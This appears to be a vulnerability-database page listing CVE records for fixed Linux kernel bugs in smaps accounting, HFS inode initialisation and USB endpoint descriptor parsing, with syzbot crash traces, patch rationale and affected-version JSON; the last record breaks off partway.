In the Linux kernel, the following vulnerability has been resolved:
fs/proc: task_mmu.c: don't read mapcount for migration entry
The syzbot reported the below BUG:
kernel BUG at include/linux/page-flags.h:785!
invalid opcode: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 4392 Comm: syz-executor560 Not tainted 5.16.0-rc6-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
RIP: 0010:PageDoubleMap include/linux/page-flags.h:785 [inline]
RIP: 0010:__page_mapcount+0x2d2/0x350 mm/util.c:744
Call Trace:
page_mapcount include/linux/mm.h:837 [inline]
smaps_account+0x470/0xb10 fs/proc/task_mmu.c:466
smaps_pte_entry fs/proc/task_mmu.c:538 [inline]
smaps_pte_range+0x611/0x1250 fs/proc/task_mmu.c:601
walk_pmd_range mm/pagewalk.c:128 [inline]
walk_pud_range mm/pagewalk.c:205 [inline]
walk_p4d_range mm/pagewalk.c:240 [inline]
walk_pgd_range mm/pagewalk.c:277 [inline]
__walk_page_range+0xe23/0x1ea0 mm/pagewalk.c:379
walk_page_vma+0x277/0x350 mm/pagewalk.c:530
smap_gather_stats.part.0+0x148/0x260 fs/proc/task_mmu.c:768
smap_gather_stats fs/proc/task_mmu.c:741 [inline]
show_smap+0xc6/0x440 fs/proc/task_mmu.c:822
seq_read_iter+0xbb0/0x1240 fs/seq_file.c:272
seq_read+0x3e0/0x5b0 fs/seq_file.c:162
vfs_read+0x1b5/0x600 fs/read_write.c:479
ksys_read+0x12d/0x250 fs/read_write.c:619
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x44/0xae
The reproducer was trying to read /proc/$PID/smaps when calling
MADV_FREE at the mean time. MADV_FREE may split THPs if it is called
for partial THP. It may trigger the below race:
CPU A CPU B
----- -----
smaps walk: MADV_FREE:
page_mapcount()
PageCompound()
split_huge_page()
page = compound_head(page)
PageDoubleMap(page)
When calling PageDoubleMap() this page is not a tail page of THP anymore
so the BUG is triggered.
This could be fixed by elevated refcount of the page before calling
mapcount, but that would prevent it from counting migration entries, and
it seems overkilling because the race just could happen when PMD is
split so all PTE entries of tail pages are actually migration entries,
and smaps_account() does treat migration entries as mapcount == 1 as
Kirill pointed out.
Add a new parameter for smaps_account() to tell this entry is migration
entry then skip calling page_mapcount(). Don't skip getting mapcount
for device private entries since they do track references with mapcount.
Pagemap also has the similar issue although it was not reported. Fixed
it as well.
[shy828301@gmail.com: v4]
[nathan@kernel.org: avoid unused variable warning in pagemap_pmd_range()]
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:25:01.601Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/db3f3636e4aed2cba3e4e7897a053323f7a62249"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a8dd0cfa37792863b6c4bf9542975212a6715d49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/05d3f8045efa59457b323caf00bdb9273b7962fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24d7275ce2791829953ed4e72f68277ceb2571c6"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48802",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:59:00.417239Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:14.260Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/proc/task_mmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "db3f3636e4aed2cba3e4e7897a053323f7a62249",
"status": "affected",
"version": "e9b61f19858a5d6c42ce2298cf138279375d0d9b",
"versionType": "git"
},
{
"lessThan": "a8dd0cfa37792863b6c4bf9542975212a6715d49",
"status": "affected",
"version": "e9b61f19858a5d6c42ce2298cf138279375d0d9b",
"versionType": "git"
},
{
"lessThan": "05d3f8045efa59457b323caf00bdb9273b7962fa",
"status": "affected",
"version": "e9b61f19858a5d6c42ce2298cf138279375d0d9b",
"versionType": "git"
},
{
"lessThan": "24d7275ce2791829953ed4e72f68277ceb2571c6",
"status": "affected",
"version": "e9b61f19858a5d6c42ce2298cf138279375d0d9b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/proc/task_mmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.5"
},
{
"lessThan": "4.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.102",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.25",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.102",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.25",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.10",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "4.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/proc: task_mmu.c: don\u0027t read mapcount for migration entry\n\nThe syzbot reported the below BUG:\n\n kernel BUG at include/linux/page-flags.h:785!\n invalid opcode: 0000 [#1] PREEMPT SMP KASAN\n CPU: 1 PID: 4392 Comm: syz-executor560 Not tainted 5.16.0-rc6-syzkaller #0\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\n RIP: 0010:PageDoubleMap include/linux/page-flags.h:785 [inline]\n RIP: 0010:__page_mapcount+0x2d2/0x350 mm/util.c:744\n Call Trace:\n page_mapcount include/linux/mm.h:837 [inline]\n smaps_account+0x470/0xb10 fs/proc/task_mmu.c:466\n smaps_pte_entry fs/proc/task_mmu.c:538 [inline]\n smaps_pte_range+0x611/0x1250 fs/proc/task_mmu.c:601\n walk_pmd_range mm/pagewalk.c:128 [inline]\n walk_pud_range mm/pagewalk.c:205 [inline]\n walk_p4d_range mm/pagewalk.c:240 [inline]\n walk_pgd_range mm/pagewalk.c:277 [inline]\n __walk_page_range+0xe23/0x1ea0 mm/pagewalk.c:379\n walk_page_vma+0x277/0x350 mm/pagewalk.c:530\n smap_gather_stats.part.0+0x148/0x260 fs/proc/task_mmu.c:768\n smap_gather_stats fs/proc/task_mmu.c:741 [inline]\n show_smap+0xc6/0x440 fs/proc/task_mmu.c:822\n seq_read_iter+0xbb0/0x1240 fs/seq_file.c:272\n seq_read+0x3e0/0x5b0 fs/seq_file.c:162\n vfs_read+0x1b5/0x600 fs/read_write.c:479\n ksys_read+0x12d/0x250 fs/read_write.c:619\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nThe reproducer was trying to read /proc/$PID/smaps when calling\nMADV_FREE at the mean time. MADV_FREE may split THPs if it is called\nfor partial THP. It may trigger the below race:\n\n CPU A CPU B\n ----- -----\n smaps walk: MADV_FREE:\n page_mapcount()\n PageCompound()\n split_huge_page()\n page = compound_head(page)\n PageDoubleMap(page)\n\nWhen calling PageDoubleMap() this page is not a tail page of THP anymore\nso the BUG is triggered.\n\nThis could be fixed by elevated refcount of the page before calling\nmapcount, but that would prevent it from counting migration entries, and\nit seems overkilling because the race just could happen when PMD is\nsplit so all PTE entries of tail pages are actually migration entries,\nand smaps_account() does treat migration entries as mapcount == 1 as\nKirill pointed out.\n\nAdd a new parameter for smaps_account() to tell this entry is migration\nentry then skip calling page_mapcount(). Don\u0027t skip getting mapcount\nfor device private entries since they do track references with mapcount.\n\nPagemap also has the similar issue although it was not reported. Fixed\nit as well.\n\n[shy828301@gmail.com: v4]\n[nathan@kernel.org: avoid unused variable warning in pagemap_pmd_range()]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:23:25.370Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/db3f3636e4aed2cba3e4e7897a053323f7a62249"
},
{
"url": "https://git.kernel.org/stable/c/a8dd0cfa37792863b6c4bf9542975212a6715d49"
},
{
"url": "https://git.kernel.org/stable/c/05d3f8045efa59457b323caf00bdb9273b7962fa"
},
{
"url": "https://git.kernel.org/stable/c/24d7275ce2791829953ed4e72f68277ceb2571c6"
}
],
"title": "fs/proc: task_mmu.c: don\u0027t read mapcount for migration entry",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48802",
"datePublished": "2024-07-16T11:43:54.961Z",
"dateReserved": "2024-07-16T11:38:08.896Z",
"dateUpdated": "2025-05-04T08:23:25.370Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42311 (GCVE-0-2024-42311)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
hfs: fix to initialize fields of hfs_inode_info after hfs_alloc_inode()
Syzbot reports uninitialized value access issue as below:
loop0: detected capacity change from 0 to 64
=====================================================
BUG: KMSAN: uninit-value in hfs_revalidate_dentry+0x307/0x3f0 fs/hfs/sysdep.c:30
hfs_revalidate_dentry+0x307/0x3f0 fs/hfs/sysdep.c:30
d_revalidate fs/namei.c:862 [inline]
lookup_fast+0x89e/0x8e0 fs/namei.c:1649
walk_component fs/namei.c:2001 [inline]
link_path_walk+0x817/0x1480 fs/namei.c:2332
path_lookupat+0xd9/0x6f0 fs/namei.c:2485
filename_lookup+0x22e/0x740 fs/namei.c:2515
user_path_at_empty+0x8b/0x390 fs/namei.c:2924
user_path_at include/linux/namei.h:57 [inline]
do_mount fs/namespace.c:3689 [inline]
__do_sys_mount fs/namespace.c:3898 [inline]
__se_sys_mount+0x66b/0x810 fs/namespace.c:3875
__x64_sys_mount+0xe4/0x140 fs/namespace.c:3875
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
BUG: KMSAN: uninit-value in hfs_ext_read_extent fs/hfs/extent.c:196 [inline]
BUG: KMSAN: uninit-value in hfs_get_block+0x92d/0x1620 fs/hfs/extent.c:366
hfs_ext_read_extent fs/hfs/extent.c:196 [inline]
hfs_get_block+0x92d/0x1620 fs/hfs/extent.c:366
block_read_full_folio+0x4ff/0x11b0 fs/buffer.c:2271
hfs_read_folio+0x55/0x60 fs/hfs/inode.c:39
filemap_read_folio+0x148/0x4f0 mm/filemap.c:2426
do_read_cache_folio+0x7c8/0xd90 mm/filemap.c:3553
do_read_cache_page mm/filemap.c:3595 [inline]
read_cache_page+0xfb/0x2f0 mm/filemap.c:3604
read_mapping_page include/linux/pagemap.h:755 [inline]
hfs_btree_open+0x928/0x1ae0 fs/hfs/btree.c:78
hfs_mdb_get+0x260c/0x3000 fs/hfs/mdb.c:204
hfs_fill_super+0x1fb1/0x2790 fs/hfs/super.c:406
mount_bdev+0x628/0x920 fs/super.c:1359
hfs_mount+0xcd/0xe0 fs/hfs/super.c:456
legacy_get_tree+0x167/0x2e0 fs/fs_context.c:610
vfs_get_tree+0xdc/0x5d0 fs/super.c:1489
do_new_mount+0x7a9/0x16f0 fs/namespace.c:3145
path_mount+0xf98/0x26a0 fs/namespace.c:3475
do_mount fs/namespace.c:3488 [inline]
__do_sys_mount fs/namespace.c:3697 [inline]
__se_sys_mount+0x919/0x9e0 fs/namespace.c:3674
__ia32_sys_mount+0x15b/0x1b0 fs/namespace.c:3674
do_syscall_32_irqs_on arch/x86/entry/common.c:112 [inline]
__do_fast_syscall_32+0xa2/0x100 arch/x86/entry/common.c:178
do_fast_syscall_32+0x37/0x80 arch/x86/entry/common.c:203
do_SYSENTER_32+0x1f/0x30 arch/x86/entry/common.c:246
entry_SYSENTER_compat_after_hwframe+0x70/0x82
Uninit was created at:
__alloc_pages+0x9a6/0xe00 mm/page_alloc.c:4590
__alloc_pages_node include/linux/gfp.h:238 [inline]
alloc_pages_node include/linux/gfp.h:261 [inline]
alloc_slab_page mm/slub.c:2190 [inline]
allocate_slab mm/slub.c:2354 [inline]
new_slab+0x2d7/0x1400 mm/slub.c:2407
___slab_alloc+0x16b5/0x3970 mm/slub.c:3540
__slab_alloc mm/slub.c:3625 [inline]
__slab_alloc_node mm/slub.c:3678 [inline]
slab_alloc_node mm/slub.c:3850 [inline]
kmem_cache_alloc_lru+0x64d/0xb30 mm/slub.c:3879
alloc_inode_sb include/linux/fs.h:3018 [inline]
hfs_alloc_inode+0x5a/0xc0 fs/hfs/super.c:165
alloc_inode+0x83/0x440 fs/inode.c:260
new_inode_pseudo fs/inode.c:1005 [inline]
new_inode+0x38/0x4f0 fs/inode.c:1031
hfs_new_inode+0x61/0x1010 fs/hfs/inode.c:186
hfs_mkdir+0x54/0x250 fs/hfs/dir.c:228
vfs_mkdir+0x49a/0x700 fs/namei.c:4126
do_mkdirat+0x529/0x810 fs/namei.c:4149
__do_sys_mkdirat fs/namei.c:4164 [inline]
__se_sys_mkdirat fs/namei.c:4162 [inline]
__x64_sys_mkdirat+0xc8/0x120 fs/namei.c:4162
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
It missed to initialize .tz_secondswest, .cached_start and .cached_blocks
fields in struct hfs_inode_info after hfs_alloc_inode(), fix it.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42311",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:58.669472Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:27.119Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/hfs/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f7316b2b2f11cf0c6de917beee8d3de728be24db",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4a52861cd76e79f1a593beb23d096523eb9732c2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "10f7163bfb5f8b4e0c9c05a939f20b8540e33c65",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d55aae5c1730d6b70d5d8eaff00113cd34772ea3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "58d83fc160505a7009c39dec64effaac5129b971",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9c4e40b9b731220f9464975e49da75496e3865c4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d3493d6f0dfb1ab5225b62faa77732983f2187a1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "26a2ed107929a855155429b11e1293b83e6b2a8b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/hfs/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: fix to initialize fields of hfs_inode_info after hfs_alloc_inode()\n\nSyzbot reports uninitialized value access issue as below:\n\nloop0: detected capacity change from 0 to 64\n=====================================================\nBUG: KMSAN: uninit-value in hfs_revalidate_dentry+0x307/0x3f0 fs/hfs/sysdep.c:30\n hfs_revalidate_dentry+0x307/0x3f0 fs/hfs/sysdep.c:30\n d_revalidate fs/namei.c:862 [inline]\n lookup_fast+0x89e/0x8e0 fs/namei.c:1649\n walk_component fs/namei.c:2001 [inline]\n link_path_walk+0x817/0x1480 fs/namei.c:2332\n path_lookupat+0xd9/0x6f0 fs/namei.c:2485\n filename_lookup+0x22e/0x740 fs/namei.c:2515\n user_path_at_empty+0x8b/0x390 fs/namei.c:2924\n user_path_at include/linux/namei.h:57 [inline]\n do_mount fs/namespace.c:3689 [inline]\n __do_sys_mount fs/namespace.c:3898 [inline]\n __se_sys_mount+0x66b/0x810 fs/namespace.c:3875\n __x64_sys_mount+0xe4/0x140 fs/namespace.c:3875\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nBUG: KMSAN: uninit-value in hfs_ext_read_extent fs/hfs/extent.c:196 [inline]\nBUG: KMSAN: uninit-value in hfs_get_block+0x92d/0x1620 fs/hfs/extent.c:366\n hfs_ext_read_extent fs/hfs/extent.c:196 [inline]\n hfs_get_block+0x92d/0x1620 fs/hfs/extent.c:366\n block_read_full_folio+0x4ff/0x11b0 fs/buffer.c:2271\n hfs_read_folio+0x55/0x60 fs/hfs/inode.c:39\n filemap_read_folio+0x148/0x4f0 mm/filemap.c:2426\n do_read_cache_folio+0x7c8/0xd90 mm/filemap.c:3553\n do_read_cache_page mm/filemap.c:3595 [inline]\n read_cache_page+0xfb/0x2f0 mm/filemap.c:3604\n read_mapping_page include/linux/pagemap.h:755 [inline]\n hfs_btree_open+0x928/0x1ae0 fs/hfs/btree.c:78\n hfs_mdb_get+0x260c/0x3000 fs/hfs/mdb.c:204\n hfs_fill_super+0x1fb1/0x2790 fs/hfs/super.c:406\n mount_bdev+0x628/0x920 fs/super.c:1359\n hfs_mount+0xcd/0xe0 fs/hfs/super.c:456\n legacy_get_tree+0x167/0x2e0 fs/fs_context.c:610\n vfs_get_tree+0xdc/0x5d0 fs/super.c:1489\n do_new_mount+0x7a9/0x16f0 fs/namespace.c:3145\n path_mount+0xf98/0x26a0 fs/namespace.c:3475\n do_mount fs/namespace.c:3488 [inline]\n __do_sys_mount fs/namespace.c:3697 [inline]\n __se_sys_mount+0x919/0x9e0 fs/namespace.c:3674\n __ia32_sys_mount+0x15b/0x1b0 fs/namespace.c:3674\n do_syscall_32_irqs_on arch/x86/entry/common.c:112 [inline]\n __do_fast_syscall_32+0xa2/0x100 arch/x86/entry/common.c:178\n do_fast_syscall_32+0x37/0x80 arch/x86/entry/common.c:203\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/common.c:246\n entry_SYSENTER_compat_after_hwframe+0x70/0x82\n\nUninit was created at:\n __alloc_pages+0x9a6/0xe00 mm/page_alloc.c:4590\n __alloc_pages_node include/linux/gfp.h:238 [inline]\n alloc_pages_node include/linux/gfp.h:261 [inline]\n alloc_slab_page mm/slub.c:2190 [inline]\n allocate_slab mm/slub.c:2354 [inline]\n new_slab+0x2d7/0x1400 mm/slub.c:2407\n ___slab_alloc+0x16b5/0x3970 mm/slub.c:3540\n __slab_alloc mm/slub.c:3625 [inline]\n __slab_alloc_node mm/slub.c:3678 [inline]\n slab_alloc_node mm/slub.c:3850 [inline]\n kmem_cache_alloc_lru+0x64d/0xb30 mm/slub.c:3879\n alloc_inode_sb include/linux/fs.h:3018 [inline]\n hfs_alloc_inode+0x5a/0xc0 fs/hfs/super.c:165\n alloc_inode+0x83/0x440 fs/inode.c:260\n new_inode_pseudo fs/inode.c:1005 [inline]\n new_inode+0x38/0x4f0 fs/inode.c:1031\n hfs_new_inode+0x61/0x1010 fs/hfs/inode.c:186\n hfs_mkdir+0x54/0x250 fs/hfs/dir.c:228\n vfs_mkdir+0x49a/0x700 fs/namei.c:4126\n do_mkdirat+0x529/0x810 fs/namei.c:4149\n __do_sys_mkdirat fs/namei.c:4164 [inline]\n __se_sys_mkdirat fs/namei.c:4162 [inline]\n __x64_sys_mkdirat+0xc8/0x120 fs/namei.c:4162\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nIt missed to initialize .tz_secondswest, .cached_start and .cached_blocks\nfields in struct hfs_inode_info after hfs_alloc_inode(), fix it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:30.651Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f7316b2b2f11cf0c6de917beee8d3de728be24db"
},
{
"url": "https://git.kernel.org/stable/c/4a52861cd76e79f1a593beb23d096523eb9732c2"
},
{
"url": "https://git.kernel.org/stable/c/10f7163bfb5f8b4e0c9c05a939f20b8540e33c65"
},
{
"url": "https://git.kernel.org/stable/c/d55aae5c1730d6b70d5d8eaff00113cd34772ea3"
},
{
"url": "https://git.kernel.org/stable/c/58d83fc160505a7009c39dec64effaac5129b971"
},
{
"url": "https://git.kernel.org/stable/c/9c4e40b9b731220f9464975e49da75496e3865c4"
},
{
"url": "https://git.kernel.org/stable/c/d3493d6f0dfb1ab5225b62faa77732983f2187a1"
},
{
"url": "https://git.kernel.org/stable/c/26a2ed107929a855155429b11e1293b83e6b2a8b"
}
],
"title": "hfs: fix to initialize fields of hfs_inode_info after hfs_alloc_inode()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42311",
"datePublished": "2024-08-17T09:09:15.793Z",
"dateReserved": "2024-07-30T07:40:12.277Z",
"dateUpdated": "2025-05-04T09:26:30.651Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41035 (GCVE-0-2024-41035)
Vulnerability from cvelistv5
Published
2024-07-29 14:31
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
USB: core: Fix duplicate endpoint bug by clearing reserved bits in the descriptor
Syzbot has identified a bug in usbcore (see the Closes: tag below)
caused by our assumption that the reserved bits in an endpoint
descriptor's bEndpointAddress field will always be 0. As a result of
the bug, the endpoint_is_duplicate() routine in config.c (and possibly
other routines as well) may believe that two descriptors are for
distinct endpoints, even though they have the same direction and
endpoint number. This can lead to confusion, including the bug
identified by syzbot (two descriptors with matching endpoint numbers
and directions, where one was interrupt and the other was bulk).
To fix the bug, we will clear the reserved bits in bEndpointAddress
when we parse the descriptor. (Note that both the USB-2.0 and USB-3.1
specs say these bits are "Reserved, reset to zero".) This requires us
to make a copy of the descriptor earlier in usb_parse_endpoint() and
use the copy instead of the original when checking for duplicates.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0a8fd1346254974c3a852338508e4a4cddbb35f1 Version: 0a8fd1346254974c3a852338508e4a4cddbb35f1 Version: 0a8fd1346254974c3a852338508e4a4cddbb35f1 Version: 0a8fd1346254974c3a852338508e4a4cddbb35f1 Version: 0a8fd1346254974c3a852338508e4a4cddbb35f1 Version: 0a8fd1346254974c3a852338508e4a4cddbb35f1 Version: 0a8fd1346254974c3a852338508e4a4cddbb35f1 Version: 0a8fd1346254974c3a852338508e4a4cddbb35f1 Version: c3726b442527ab31c7110d0445411f5b5343db01 Version: 15668b4354b38b41b316571deed2763d631b2977 Version: 8597a9245181656ae2ef341906e5f40af323fbca Version: 264024a2676ba7d91fe7b1713b2c32d1b0b508cb Version: b0de742a1be16b76b534d088682f18cf57f012d2 Version: 7cc00abef071a8a7d0f4457b7afa2f57f683d83f Version: 05b0f2fc3c2f9efda47439557e0d51faca7e43ed |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.166Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8418fd083d1b90a6c007cf8dcf81aeae274727b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/60abea505b726b38232a0ef410d2bd1994a77f78"
},
{
"tags": [
"x_transferred"
],
